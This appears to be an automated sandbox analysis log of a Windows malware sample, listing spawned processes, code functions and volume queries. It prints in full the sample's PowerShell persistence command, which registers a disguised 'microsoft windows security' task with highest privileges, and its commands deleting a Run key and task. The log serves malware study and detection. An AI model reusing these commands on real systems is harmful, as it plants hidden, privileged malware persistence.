Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Code function: 1_2_000000014006EC90 cpuid

1_2_000000014006EC90

Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: EnumSystemLocalesW,	1_2_000000014006D098
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: GetLocaleInfoW,	1_2_000000014006D130
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: GetLocaleInfoW,	1_2_000000014006D240
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: EnumSystemLocalesW,	1_2_0000000140067250
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_000000014006D328
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: GetLocaleInfoW,	1_2_000000014006D3D8
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_000000014006CA78
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: try_get_function,GetLocaleInfoW,	1_2_0000000140066B24
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: EnumSystemLocalesW,	1_2_000000014006CD78
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_000000014006CE50
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: GetLocaleInfoA,strcmp,	5_2_0040F1B0
Source: C:\Windows\sysppvrdnvs.exe	Code function: GetLocaleInfoA,strcmp,	6_2_0040F1B0
Source: C:\Windows\sysppvrdnvs.exe	Code function: GetLocaleInfoA,strcmp,	19_2_0040F1B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\158238779.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
